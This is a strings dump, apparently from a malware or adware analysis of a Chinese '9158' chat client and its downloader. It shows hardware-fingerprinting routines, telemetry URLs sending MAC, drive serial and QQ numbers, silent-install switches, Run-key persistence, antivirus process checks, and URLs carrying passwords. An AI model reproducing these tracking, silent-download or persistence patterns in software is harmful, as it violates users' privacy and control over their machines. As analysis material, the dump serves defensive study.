OnTitleChange: text="%s"
C:\Windows\Temp\temp.icon
c://temp.icon
ProExe
DownloadUrl
ErrorUrl
AdvertUrl
XieyiUrl
hXXp://tj.9158.com/Opendownloadernewxml.aspx
<4,$?7/'
(3-!0,1'8"5.*2$
DeviceIOControl IOCTL_STORAGE_QUERY_PROPERTY error = %d
**** DISK_GEOMETRY_EX for drive %d ****
Disk is%s fixed
%d ReadPhysicalDriveInNTWithZeroRights ERROR|nDeviceIoControl(%s, IOCTL_DISK_GET_DRIVE_GEOMETRY_EX) returned 0
**** STORAGE_DEVICE_DESCRIPTOR for drive %d ****
Vendor Id = [%s]
Product Id = [%s]
Product Revision = [%s]
Serial Number = [%s]
%d STORAGE_DEVICE_DESCRIPTOR contents for drive %d
DeviceType: x
DeviceTypeModifier: x
RemovableMedia: %d
CommandQueueing: %d
BusType: %d
%d ReadPhysicalDriveInNTWithZeroRights ERROR
CreateFile(%s) returned INVALID_HANDLE_VALUE
\\.\PhysicalDrive%d
Drive%dType
DriveÜontrollerBufferSize
DriveÜontrollerRevisionNumber
Drive%dSerialNumber
Drive%dModelNumber
Controller Buffer Size on Drive___: %s bytes
Drive Controller Revision Number__: [%s]
Drive Serial Number_______________: [%s]
Drive Model Number________________: [%s]
Drive %d -
%d ReadPhysicalDriveInNTWithAdminRights ERROR
No device found at position %d (%d)
DeviceIoControl(%d, DFP_GET_VERSION) returned 0, error is %d
%d ReadPhysicalDriveInNTUsingSmart ERROR
DeviceIoControl(%d, SMART_GET_VERSION) returned 0, error is %d
Error Code %d
ERROR: Could not open IDE21201.VXD file
\\.\IDE21201.VXD
ERROR: Could not SetPriorityClass, LastError: %d
\\.\Scsi%d:
Hard Drive Model Number___________: %s
Hard Drive Serial Number__________: %s
%s (%s:%d)
D:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\afxwin1.inl
softlist=%s&lmarkid=%s
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028
w@C:\Windows\Temp\
%sDownLoad
_%s%s.exe
_%s.exe
/S /D=%s
%sDownLoad\%s
Browser=%s
&Resolution=%s&OS=%s&KEY=%s&Mac=%s&HardDrive=%s&CPU=%s&Graphics=%s
&Safe=%s&QQ=%s&Sougou=%s&Lmarkid=%s&Wmarkid=%s&Mtype=%s&tick=%d&flag=%s&status=%d&qqnumber=%s
&downloadtime=%d&setuptime=%d&downloadflag=%d&v=V1.9
hXXp://tj.9158.com/DownloadInsertinfo.aspx?
%ld%s%s
%d*%d
%s(%s)
...%d%c
%Program Files%
%s Inx:%d Offset:%d Len:%d
.tmp.tg
****ERR:%d,
nInx:%d, offset:%d, siz:%d
%d, lRemain
ConnectSvr:%s
X-X-X-X-X-X
SOFTWARE\%s
Microsoft Windows 95
Microsoft Windows NT 4.0
Microsoft Windows 98
Microsoft Windows Me
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows Server 2003 R2
Microsoft Windows Server 2003
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2008
Microsoft Windows Vista
Microsoft Windows Server 2008 R2
Microsoft Windows 7
unknown OperatingSystem.
Web Edition
\StringFileInfo\xx\ProductVersion
\StringFileInfo\xx\ProductName
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
SOFTWARE\Microsoft\Windows NT\CurrentVersion
http\shell\open\command
%s %s
\SogouExe\SogouExe.exe
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Sogou Input
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sogou Input
%Program Files% (x86)\SogouInput\SogouExe\SogouExe.exe
%Program Files%\SogouInput\SogouExe\SogouExe.exe
M.exe
deepscan\zhudongfangyu.exe
360safe.exe
ZhuDongFangYu.exe
QQ.exe
T58web
9158web
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
HTTP/1.1
%s?log=%s&version=20140121
hXXp://tj.9158.com/logtest.aspx
:%d,server:%s, ip:%s,
:url:%s, server:%s,error msg:%s, errcode:%d
kernel32.dll
CNotSupportedException
hhctrl.ocx
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
commctrl_DragListMsg
CCmdTarget
CHttpConnection
CHttpFile
hXXp://
WININET.DLL
HTTP/1.0
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
File%d
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
ntdll.dll
%s%s.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
comctl32.dll
comdlg32.dll
shell32.dll
mfcm90.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
user32.dll
ole32.dll
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
operator
GetProcessWindowStation
USER32.DLL
F%D,3
OLEACC.dll
SHLWAPI.dll
WSOCK32.dll
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
KERNEL32.dll
GetKeyState
UnhookWindowsHookEx
SetWindowsHookExA
CreateDialogIndirectParamA
USER32.dll
GetViewportExtEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GDI32.dll
COMDLG32.dll
WINSPOOL.DRV
RegCloseKey
RegOpenKeyA
RegCreateKeyExA
RegOpenKeyExA
RegEnumKeyExA
RegDeleteKeyA
RegEnumKeyA
ADVAPI32.dll
ShellExecuteA
ShellExecuteExA
SHELL32.dll
COMCTL32.dll
oledlg.dll
OLEAUT32.dll
GdiplusShutdown
gdiplus.dll
NETAPI32.dll
VERSION.dll
UrlUnescapeA
InternetCrackUrlA
InternetCanonicalizeUrlA
HttpQueryInfoA
HttpSendRequestA
InternetOpenUrlA
HttpOpenRequestA
WININET.dll
.?AVCCmdTarget@@
.PAVCFileException@@
.?AV?$CList@PAVCFTPTask@@AAPAV1@@@
.PAVCException@@
.?AVCFTPTask@@
.?AVCHttpService@@
.?AVCMD5Checksum@@
.PAVCObject@@
.PAVCOleException@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
.PAVCUserException@@
.PAVCResourceException@@
.PAVCInternetException@@
.?AVCHttpConnection@@
.?AVCHttpFile@@
.PAVCArchiveException@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.PAVCOleDispatchException@@
zcÁ
00000000000000000001
D:\MM-liao9728.exe
`R.qB
h/y%DlRZ
J!Ç
<yB*.*
yR^y.%U3
/.Ro}!
p)%sQ
CZ%SY
.vyOx
.Pm[<
42a%u
O%fWU
%cPqt
F2/%c
C7%SQ5
XU%fR
QN.Ui
IßD
(Bô|
.Qsty
.bYV`
40%sS
%%co\s
P.WGD
2Um
%U2b&0
%se7sQ
[Q.QN]
4g%x=XL$5
.Bsw&wf
uÿQ
R#.oR
45.sSC
OBW2%S2%S2
u\%Cr@
.Pd4{
[K.On
W.eQYT
gB7%U
9~ui.QBv@
J.pEu
\.MdB
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS>
accKeyboardShortcut
mscoree.dll
ekernel32.dll
KERNEL32.DLL
DownloadInstall.Document
(*.*)
Output.prn$
(*.prn)|*.prn|
(*.*)|*.*||
1, 0, 0, 1
DownloadInstall.EXE

9158.exe_3180:

.text
`.rdata
@.data
.rsrc
SSh0'
@ SSh`
N SShy
t.hD{R
O SSh
W SSh
H SSh
@ SShU
SSSSSSSh
F SSh
<4,$?7/'
(3-!0,1'8"5.*2$
unzip 0.18 Copyright 1998-2002 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
1.1.4
inflate 1.1.4 Copyright 1995-2002 Mark Adler
HttpQueryInfoA
InternetOpenUrlA
WININET.dll
?IsControlHaveSkin@CAppSysOperation@@UAEHXZ
?CleanBitmapMem@CAppSysOperation@@UAEHXZ
?LoadBitmapFileToMem@CAppSysOperation@@UAEHPAUHINSTANCE__@@VCString@@PAVCBitmap@@@Z
?LoadBitmapFileToMem@CAppSysOperation@@UAEHPAUHINSTANCE__@@VCString@@@Z
?InitializeOperation@CAppSysOperation@@UAEXPAVCWnd@@@Z
?CleanSkin@CAppSysOperation@@UAEHPAX@Z
?DrawContent@CAppSysOperation@@UAEHPAVCDC@@VCString@@AAVCRect@@H@Z
?AdjustPosition@CAppSysOperation@@UAEHHHHH@Z
?AdjustPosition@CAppSysOperation@@UAEHUtagRECT@@@Z
?DrawSkin@CAppSysOperation@@UAEHPAUtagDRAWITEMSTRUCT@@@Z
?PaintBackGround@CAppSysOperation@@UAEHPAVCDC@@@Z
?CleanUp@CAppSysOperation@@UAEXXZ
?AttachBitmapHadle@CAppSysOperation@@UAEXPAUHBITMAP__@@PAVCBitmap@@@Z
?AttachBitmapHadle@CAppSysOperation@@UAEXPAUHBITMAP__@@@Z
?PreTranslateMessage@CUIButtonTemplate@@MAEHPAUtagMSG@@@Z
?messageMap@CUIButtonTemplate@@1UAFX_MSGMAP@@B
?GetCurrentSkin@CAppSysOperation@@UAEHPAX@Z
?LoadSkin@CAppSysOperation@@UAEHPAX@Z
?FitBitmapSize@CAppSysOperation@@UAEXXZ
?messageMap@CUIDlgTemplate@@1UAFX_MSGMAP@@B
?GetBitmapHeight@CAppSysOperation@@QAEHXZ
?GetBitmapWidth@CAppSysOperation@@QAEHXZ
?messageMap@CCustomDlg@@1UAFX_MSGMAP@@B
?LoadSkinToBitmap@CAppSysOperation@@SA_NAAVCBitmap@@PAXAA_N@Z
?SetSkinPath@CAppSysOperation@@SAXVCString@@@Z
?GetPictureExEx@CSkinConfContext@@QAEPAXPBDH@Z
?GetMessageMap@CUIListCtrlEx@@MBEPBUAFX_MSGMAP@@XZ
MVUILib.dll
MSIMG32.dll
MFC42.DLL
MSVCRT.dll
_acmdln
WinExec
GetCPInfo
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
COMCTL32.dll
ole32.dll
OLEPRO32.DLL
OLEAUT32.dll
WSOCK32.dll
MSVCP60.dll
GdiplusShutdown
gdiplus.dll
publictool.dll
IdleTrac.dll
NETAPI32.dll
SHLWAPI.dll
WINMM.dll
pdh.dll
9158.exe
?GetPassword@CRoomInfo@@QAE?AVCString@@XZ
?GetPort@CRoomInfo@@QAEHXZ
?SetPassword@CRoomInfo@@QAEXPBD@Z
?SetPort@CRoomInfo@@QAEXH@Z
ItemList/Item[ItemName = '%s']/ItemText
ItemList/Item[ItemID = %d]/ItemText
IDispatch error #%d
FSkinRes\HollSplitter.bmp
SkinRes\VIPRoomSkin\row.bmp
%s\%s
%s9158.exe
chatQK.xml
SkinRes\unlock.bmp
dance_room/dance_coffer.aspx
useridx=%s&userpass=%s&type=1
doid=%d&fromid=%d&stepid=%d
%s?url=%s
m_lpNormal->CopyHoleDC(%d, 0, %d, %d)
m_lpActive->CopyHoleDC(0, 0, %d, %d)
%e rcRect(%d,%d,%d,%d)
CBmpProgCtrl..........................................%f*%d = %d
//player.ini
SkinRes\BroadCastBtn.bmp
SkinRes\Broadcastclose.bmp
OnBeforeNavigation: URL="%s", frame="%s", post_data=[0xX,%d bytes], headers="%s"
OnDocumentComplete: URL="%s"
OnProgressChange: progress=%d, progress_max=%d
OnNavigationComplete2: URL="%s"
OnStatusTextChange: text="%s"
OnTitleChange: text="%s"
\SkinRes\fragment.bmp
active.ini
.PAVCInternetException@@
itemboxconfig.xml
faceconfig.xml
itemconfig.xml
\Fruit\fruit.xml
Banner.xml
car.xml
\allplat.xml
%s,%ld,%d,%d,%d,%d,%s
DownLoad.exe
\SkinRes\waring.bmp
hXXp://img8.9158.com/200808/09/00/25/200808091735989s.jpg
%s(%d)
User32.DLL
SkinRes/DriftingHorn.png
%s&userid=%s&type=%d
\tui_AD.ini
\logincount.ini
ToOpenUrl2
GotoWebUrl2
UserLogin
ToOpenUrl
GotoWebUrl
OnWebMessageBox
MsgEnterRoom
AppOpenUrl
LoginErrorRoom
PassAdUser
//weibo.ini
div.img50 img { max-width:60px; max-height:60px;
yqh:expression((this.offsetWidth > this.offsetHeight)?
(this.style.width = this.offsetWidth >= 60 ? "60px" : "auto"):
(this.style.height = this.offsetHeight >= 60 ? "60px" : "auto"));
<div class="img50"><img src='%s' /></div></body>
SkinRes\spinbtn_leftright.bmp
SkinRes\flashTab.bmp
SkinRes\flashTabDown.bmp
%d/%d
SkinRes\MoneyTip.bmp
%Y-%m-%d %H:%M:%S %W-%A
%s\*.*
DynamicEffects\LightSticks.db
DynamicEffects\CaiShenImages.db
DynamicEffects\FireworksImages.db
\DynamicEffects.zip
DynamicEffects\DynamicEffects.zip
\\.\PhysicalDrive%d
\\.\Scsi%d:
XXXXXX
X-
Iphlpapi.dll
cugame.9158.com
active/salebag/getinfo.aspx
SkinRes\btn_giftHorn.bmp
SkinRes/bg_giftHorn.png
CityWide_Step1.sysclose
CareFor(t58)_Step1.dancebtn
CareFor(9158)_Step1.freebtn
CareFor(9158)_Step1.makefriendbtn
CareFor(9158)_Step1.songbtn
CareFor(t58)_Step1.freebtn
CareFor(t58)_Step1.makefriendbtn
Favorite_Step1.select_storebtn
.nevernoticebtn
.receive
LoginReceive_
.iknow
.reg_account
QQLogin_
.songbtn
.dancebtn
.freebtn
.makefriendbtn
.sysclose
.closebtn
.select_unstorebtn
.select_storebtn
Guide_%d
\guidestate.ini
WizardDll.dll
public.dll
hXXp://tj.9158.com/qinqinlog.aspx?%s
Lmarkid=%s&Wmarkid=%s&mac=%s&Qinqinumber=%d&useridx=%s&flagmd5=%s
%s%stest0313
%Y-%m-%d
tui.ini
room_regsum.aspx
useridx=%s&nTime=%d&nType=%s
%d$^&&***WEWEE%s
HallClose.ini
broadHistory.txt
SOFTWARE\9158web\%s
skinres\99Lover.xml
ProxyID.ini
promo/promo_installnum_insert.aspx
ip=%s&nType=%s&mac=%s&promoinfo=%s&content=%s
promo/promo_guestnum_insert.aspx
ip=%s&nType=%s&mac=%s&uidx=%s&time=%d&promoinfo=%s&content=%s
&&**WEWEE%s
%sOnlineUpdate.exe %d
UserInfo.xml
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
ImageOle.dll
login9158.dll
Invoker9158.dll
userinfo.txt
<?xml version="1.0" encoding="GB2312"?>%s
%d%s%s%s
ip=%s&nType=%s&insert=%s&time=%d
EnterRoomURL
9158:{"uidx":%s,"uid":"%s","usex":%s,"viplevel":%d}^|$|^%s
6,%s,%s,0,0
6,%s,%s,%s,%s,%s,%s,%s
LobbyClient.dll
IMClient.dll
DynamicEffects.dll
skinres\skin.ini
//HallClose.ini
<MARQUEE ONMOUSEOUT=this.start() ONMOUSEOVER=this.stop() scrollAmount=1 scrollDelay=2 direction=left></MARQUEE></div></body></html>
skinres\Hall\Signal.bmp
skinres\Hall\currentver.bmp
skinres\Hall\SearchRoomBottomRight.bmp
skinres\Hall\SearchRoomBottomLeft.bmp
skinres\Hall\mainietopright.bmp
skinres\Hall\mainietopLeft.bmp
\SkinRes\HallToolbar.bmp
VideoHelper.dll
SOFTWARE\9158web
AudioPort
Port
%s\%d
%s(%s)
Content-Type: application/x-www-form-urlencoded
url=%s
hXXp://room.9158.com/userroom_get.aspx?roomid=%d&useridx=%s
MainUrl->LeaveRoom_Step1.MainUrl=>Url:hXXp://room.9158.com/ktv_new/ktv_tuiinfo.aspx?roomid=%d&&
idx=%s&u_name=%s&c_name=%s
tiaoshi: %s===>%s
hXXp://room.9158.com/apps/webloginapi.aspx
?type=%d
hXXp://VVV.9158.com
hXXp://room.9158.com
&time=%s&viewpa=1
&time=%s&viewpa=2
%d%d%d%d%d%d
hXXp://cugame.9158.com/active/salebag/getinfo.aspx?id=%s&pwd=%s
LastLoginType
DDVLobby.exe
hXXp://60.191.252.121:8081/DDVGL_Setup.exe
broadcastchat.xml
SkinRes\IM.bmp
face\faceconfig.xml
SOFTWARE\9158web\
allplat.xml
SendVideoSpaceMsg.aspx
my.9158.com
userid=%s&nickname=%s&roomid=%s
Text->CareFor(9158)_Step1.listen=>Content:%d
&&Text->CareFor(9158)_Step1.talk=>Content:%d
&&Text->CareFor(9158)_Step1.sing=>Content:%d
?aid=%d
sound//msg.wav
sound//cash.wav
Text->Task_LevelUp.Text1=>Left:85Top:40Content: 
&&Text->Task_LevelUp.Text2=>Left:57Top:65Content: %d
Text->QQLogin_Step1.Account=>Content:%d&&Text->QQLogin_Step1.UserName=>Content:%s&&
GiftHorn.xml
AgentHorn.xml
DriftBroadcast.xml
%d(%s);
Serial:%d
====ItemIndex=%d==&&===ItemNum=%d======
hXXp://room.9158.com/KTV_new/help/help_03.htm#18
<MARQUEE ONMOUSEOUT=this.start() ONMOUSEOVER=this.stop() scrollAmount=2 scrollDelay=2 direction=left>
.Marquee{ height:16px; overflow:hidden;}
.Marquee div{ width:100%; height:16px; padding-top:0px; padding-bottom: 0px;}
active/clicksave/save.aspx
user=%s&level=%d&savet=%d&clickid=%d
MixerXP.dll FAILED
MixerXP.dll
head//star.xml
Head\era.gif
<br><br><div style='font-size:14px;padding:15px'>%s<a href='hXXp://v.9158.com' target='_blank'>
%H:%M:%S
%s\%s.log
hXXp://roommanage.9158.com/active/song_tui/mm_tui.aspx?adstr=%s
hXXp://cugame.9158.com/active/getuserqq/qqinsert.aspx?user=%s&qq=%s&link=%s&stype=ktv
hXXp://room.9158.com/ktv_new/free_mic.aspx?userid=
hXXp://room.9158.com/ktv_new/song_in.aspx?userid=
&r=%d
dance_room_new/click_save.aspx
hXXp://room.9158.com/userroom_add.aspx?roomid=%d&useridx=%s
hXXp://room.9158.com/ktv_new/ktv_tuiroom_in.aspx?parttype=%d
9158.com
tiao58.com
SOFTWARE\t58web
&userid=%s&intype=2&type=%s
&type=%s
<div align=center><img onclick="window.external.FreezeBank(11);" src='
//skinres//Moneyupfreeze.bmp'></div>
//skinres//MoneyRestPass.bmp'> 
<img onclick="window.external.FreezeBank(12);" src='
%d-%d-%d %d:%d
hXXp://roommanage.9158.com/active/roomsearch/iproom_new.aspx?pstr=%s&cstr=%s&r=%d
LoginCount
hXXp://room.9158.com/apps/Activity.ashx?act=8&lastime=%s
%s?user=%s&itype=%d
SkinRes\icon_rt.png
<img src="%s" style="float:right;"/>
</strong></p><p> %s</p>
</strong></p><p> %s<a onclick="window.external.GotoGetGift()"; style="float:right; cursor:hand;">
hXXp://cugame.9158.com/active/usersearch_k/message_head.aspx?useridx=%d&head=%s&mess=%s&roomid=%d
hXXp://cugame.9158.com/active/userinfor/head_info.aspx?useridx=%d&r=%d
(*.jpg)|*.jpg||
hXXp://roommanage.9158.com/active/song_tui/code_view.aspx
&jumpurl=
&logkey=
filter.zip
help.xml
serverlist.txt
;padding-left:13px;color:#0177b5;font-size:12px;text-decoration:none}.a2 { display:block;width:180px;height:48px;background:url('#path#\btn_vip1.bmp');background-repeat:no-repeat } .a2:hover { display:block;width:180px;height:48px;background:url('#path#\btn_vip2.bmp');background-repeat:no-repeat }.a3 { display:block;width:180px;height:48px;background:url('#path#\btn_crown1.bmp');background-repeat:no-repeat } .a3:hover { display:block;width:180px;height:48px;background:url('#path#\btn_crown2.bmp');background-repeat:no-repeat }</style><body onMouseOut="window.external.OnMouseHeadOut(1)" onMouseOver="window.external.OnMouseHeadIn(1)" leftmargin=0 topmargin=0 marginwidth=0 marginheight=0 style="overflow-x:hidden;overflow-y:hidden;width:100%;border-width=0;border-style:none;"></body>
<style>.myimg{border:0px;display:block;width:180px;height:38px;background:url('#path#\btn_vip1.bmp') left no-repeat;} a:hover img{border:0px;display:block;width:180px;height:38px;background:url('#path#\btn_crown2.bmp') left no-repeat;}</style><table background='#path#\vip.jpg' width=100% height=100% border='0' cellspacing='0' cellpadding='0'><tr><td height=300> </td></tr><tr><td height=20> <a href='hXXp://vip.9158.com/ ' target=_blank class=a1>
>></a></td></tr><tr><td height=40 align=center valign=top> <a href='javascript:window.external.MsgEnterRoom(100001)' class=a2></a></td></tr></body>
<style>.myimg{border:0px;display:block;width:180px;height:38px;background:url('#path#\btn_crown1.bmp') left no-repeat;} a:hover img{border:0px;display:block;width:180px;height:38px;background:url('#path#\btn_crown2.bmp') left no-repeat;}</style><table background='#path#\crown.jpg' width=100% height=100% border='0' cellspacing='0' cellpadding='0'><tr><td height=300> </td></tr><tr><td height=20> <a href='hXXp://vip.9158.com/ ' target=_blank class=a1>
>></a></td></tr><tr><td height=40 align=center valign=top> <a href='javascript:window.external.MsgEnterRoom(100001)' class=a3></a></td></tr></body>
<html xmlns='hXXp://VVV.w3.org/1999/xhtml'><style type='text/css'>.item { position:relative; float:left; height:167px; margin:10px 15px 25px 0px; width:160px; } .item .bottom_bg, .item .del, .item .del2, .item .hide, .item .hide2, .item .line { display:none; } .item .item_bg { background:#dfefff; border:1px solid #d0e8ff; height:165px; } .lock { position:absolute; left:10px; top:10px; } .item_sel .bottom_bg, .item_sel .del, .item_sel .del2, .item_sel .hide, .item_sel .hide2, .item_sel .line { display:block; } .item_sel .item_bg { height:165px; background:#d9ecff; border:1px solid #b4daff; } .bottom_bg { position:absolute; left:0px; top:165px; width:160px; height:27px; background:#b4daff; } .item .hide, .item .del { position:absolute; left:106px; top:172px; color:#27384e; font-size:14px; text-decoration:none; } .item .del { left:22px; } .item .del2 { position:absolute; left:25px; top:172px; font-size:14px; text-decoration:none; color:#9db8da; cursor:default; } .item .hide2 { position:absolute; left:106px; top:172px; font-size:14px; text-decoration:none; color:#9db8da; cursor:default; } .prev, .next { background:#E7F3FF; border:1px solid #AFD7FF; padding:5px 15px; *padding:5px 15px 4px 15px; color:#004FB6; font-size:14px; text-decoration:none; } .prev2, .next2 { border:1px solid #b7c6d5; color:#8a9fba; cursor:default; }</style><body style='background:#EBF4FF; color:#333; font-size:12px; font-family:arial;'><div style='margin:10px auto 10px; width:99%;'><div><div style='position:relative; z-index:1; background:url(#pic#title_bg.png) repeat-x #c2e0ff; border:1px solid #bee1ff; border-left-color:#b3d7fd; border-right-color:#b3d7fd; border-bottom:none; height:36px; line-height:35px; vertical-align:middle; overflow:hidden;'><div style='position:absolute; z-index:9; left:10px; top:0px; text-align:center; font-size:14px; color:#2D4389; text-decoration:none;'>#sel1#</div><a href="javascript:window.external.OnHistory_Showinfo(1,0)" style='position:absolute; right:10px; padding-left:17px; color:#2D4389; text-decoration:none; background:url(#pic#f5.png) no-repeat 0px 10px;'>
#p6#/#p3# ' onmousemove="this.className='item item_sel'" onmouseout="this.className='item'"><div class='item_bg' onclick='window.external.OnHistory_Showinfo(2,#pa#)'><div class='img' style='position:absolute; left:0px; top:0px;'><img onerror="this.src='#purl#'" src='#p5#' style='border:none;width:160px;height:120px' /></div><div class='lock' style='display:#p4#'><img src='#pic#lock.png' /></div><div class='text' style='position:absolute; left:10px; top:124px;'><p class='name' style='color:#004fb6; padding:2px 0px; margin:0;'>#p2#</p><p style='color:#475465; padding:0; margin:0;'>#p1#</p></div></div><div class='bottom_bg'></div><span class='line' style='position:absolute; left:80px; top:165px; width:1px; height:27px; boder-left:1px solid #a9ccee; background:#a9ccee;'></span><a #p8#>
hXXp://room.9158.com/ktv_new/myroom_del.aspx?userid=%s&roomid=%s&type=%s
%s-%s|
HistoryRoom.xml
hXXp://room.9158.com/ktv_new/lately_room.aspx?r=
hXXp://room.9158.com/ktv_new/cu_myroom.aspx?userid=
href="javascript:window.external.OnHistory_Showinfo(6,#p9#)" class='next '
href="javascript:window.external.OnHistory_Showinfo(5,#p9#)" class='prev '
')){window.external.OnHistory_Showinfo(4,#pa#);}"
\skinres\fav\sel1.gif' style='border:none;'>
hXXp://room.9158.com/images/newten/go-home.gif
#purl#
hXXp://room.9158.com/ktv_new/head1.jpg
class='hide' href="javascript:window.external.OnHistory_Showinfo(3,#pa#)"
\skinres\fav\sel2.gif' style='border:none;'>
iexplore.exe
hXXp://cugame.9158.com/active/app/load.htm
login=
hXXp://VVV.9158.com/client/login/loginback.aspx?
skinres\RankRate.bmp
skinres\Hall\SearchRoomTopRight.bmp
skinres\Hall\SearchRoomTopLeft.bmp
<img width="227" height="67" src="%s">
skinres\Unknown.jpg
skinres\scroll.bmp
\Game\ddvGame.ini
SkinRes//none.bmp
SkinRes\TreeStatus.bmp
SkinRes\Hall\searchRoombtn.bmp
SkinRes\Hall\headbutton.bmp
SkinRes\Hall\MiniInfor.bmp
SkinRes\Hall\bag.bmp
SkinRes\systemCenter.bmp
SkinRes\set.bmp
SkinRes\mybank.bmp
SkinRes\vip.bmp
SkinRes\systemSet.bmp
SkinRes\systemReg.bmp
\SkinRes\IMToolBar.bmp
Head\era.bmp
Head\crown.bmp
Head\topestpurple2.bmp
Head\topestpurple.bmp
Head\DiamondPurple2.bmp
Head\DiamondPurple.bmp
Head\queenPurple2.bmp
Head\queenPurple.bmp
Head\Purple2.bmp
Head\Purple.bmp
Head\purplevip2.bmp
Head\purplevip.bmp
Head\level15.bmp
Head\redvip.bmp
Head\0_bluevip.bmp
Head\paliesman.bmp
onclick="window.external.OnclickHead('1')">
<img onMouseOut="window.external.OnMouseHeadOut(0)" onMouseOver="window.external.OnMouseHeadIn(0)" width="60" height="45" src="%s" style=cursor:hand>
hXXp://
Head\user_photo.bmp
hXXp://vip.9158.com/
Head\H5_2.bmp
Head\H5_1.bmp
Head\H4_2.bmp
Head\H4_1.bmp
Head\H3_2.bmp
Head\H3_1.bmp
Head\H2_2.bmp
Head\H2_1.bmp
Head\H1_2.bmp
Head\H1_1.bmp
Head\H0_2.bmp
Head\H0_1.bmp
-L"prdname=9158 idx=%s id=%s nick=%s pwd=%s rinfo=0"
%Y%m%d
%s\%d\%s
SkinRes\BtnMinInfor.bmp
SkinRes\BtnCloseInfor.bmp
%s&uidx=%s
SkinRes\brInfor.bmp
SkinRes\blInfor.bmp
SkinRes\trInfor.bmp
SkinRes\tlInfor.bmp
%s %s
%d||%d||%d||%s
.img50 { width:50px; height:50px; text-align:center; }
div.img50 img { max-width:50px; max-height:50px;
yqh:expression((this.offsetWidth > this.offsetHeight)?(this.style.width = this.offsetWidth >= 50 ? "50px" : "auto"):(this.style.height = this.offsetHeight >= 50 ? "50px" : "auto"));
<body scroll="no" bgcolor=#FEFECC><div class="img50"><img src='%s' /></div></body></html>
%s x%d
skinres\message.bmp
updateitem.dll
hXXp://roommanage.9158.com/room_regin/reg.aspx?introducer=%s&ntype=1&station=%s
%s;%s
LoginDlg
LoginDlg2
//banner//logbg.bmp
SkinRes\admess.bmp
\SkinRes\admess.bmp" width="
<body leftmargin=0 topmargin=0 marginwidth=0 marginheight=0 oncontextmenu="window.event.returnValue=false;" style="overflow-x:hidden;overflow-y:hidden;width:100%;border-width=0;border-style:none">
' target='_blank' onFocus='this.blur()'>
\guestlogin.ini
SkinRes\TG\QRCode.bmp
SkinRes\TG\mins1.bmp
//banner//log_min.bmp
SkinRes\TG\closes1.bmp
//banner//log_close.bmp
Hall_LoginMenu
Login_Guest
Hall_LoginCancel
Hall_LoginOK
HallLoginReg
Login_Weibo
Login_Alipay
Login_QQ
Login_idx
Login_User
GuestLogin_Tui
GetLoginNodeData.aspx
dl.week8.net
platname=%s&userid=%s&loginip=%s&loginport=%d
/Error.txt
CLoginDlg m_nLoginType!=nType
hXXp://roommanage.9158.com/active/roomsearch/iproom_in.aspx
SysMsgCloseBtn
skinres\login.gif
hXXp://VVV.9158.com/?code=
SkinRes/IeClose.png
%H : %M      %Y/%m/%d
nIDKey
MsgCloseBtn
SockClient.dll
Multi*.dll
.PAVCObject@@
.PAVCException@@
.PAVCFileException@@
%sBugReport.exe ,%s
Flags:X
DS:X ES:X FS:X GS:X
SS:ESP:X:X EBP:X
CS:EIP:X:X
EAX:X
EBX:X
ECX:X
EDX:X
ESI:X
EDI:X
Fault address1: X X:X %s
Exception code1: X %s
//build4.5%d-%d-%d %d:%d:%d***************************************************
NTDLL.DLL
FLT_INVALID_OPERATION
FLT_DENORMAL_OPERAND
X X X:X %s
SkinRes\buttonmi.bmp
SkinRes\roomclose.bmp
SkinRes\rightBackground.bmp
SkinRes\leftBackground.bmp
SkinRes\BackgroundRB.bmp
SkinRes\BackgroundLB.bmp
SkinRes\BackgroundRT.bmp
SkinRes\BackgroundLT.bmp
in_coffer_new.aspx
